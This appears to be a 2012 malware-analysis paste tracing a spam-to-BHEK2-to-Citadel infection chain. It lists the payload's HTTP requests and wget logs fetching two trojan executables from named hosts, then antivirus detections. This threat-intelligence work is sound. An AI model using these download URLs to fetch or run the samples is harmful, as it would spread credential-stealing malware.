unixfreaxjp

The BHEK2 Citadel Download these two more...

Oct 17th, 2012
*) Previous report: http://pastebin.com/raw.php?i=z7n6SVxf
*) Continuation of the Linkedin Spam, BHEK2, PluginDetect e,f, and Citadel InfoStealer(CRYPT to POST/HTTP) AND... finally that payload downloaded THESE TWO MORE Trojans.....

* GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
* GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252

--15:43:09-- http://3073.a.hostable.me/Z2U.exe
=> `Z2U.exe'
Resolving 3073.a.hostable.me... 204.152.255.3
Connecting to 3073.a.hostable.me|204.152.255.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 407,128 (398K) [application/x-msdownload]
15:43:12 (180.00 KB/s) - `Z2U.exe' saved [407128/407128]

--15:43:44-- http://85.18.21.252/PNV3Hbi.exe
=> `PNV3Hbi.exe'
Connecting to 85.18.21.252:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 407,128 (398K) [application/x-msdos-program]
15:43:49 (93.95 KB/s) - `PNV3Hbi.exe' saved [407128/407128]

VT:
https://www.virustotal.com/file/fed6336f6a8e4d09d83a9eff1485276434be3377012f7bafc99474bd0a7ce162/analysis/1350456794/
DrWeb : Trojan.PWS.Panda.3001
Norman : W32/Krypt.GB
McAfee-GW-Edition : PWS-Zbot.gen.aln
nProtect : Trojan/W32.Agent.407128.B
McAfee : PWS-Zbot.gen.aln
Fortinet : W32/Kryptik.WDV!tr
Kingsoft : Win32.Troj.Agent.ai.(kcloud)
Panda : Suspicious file

#MalwareMustDie!!!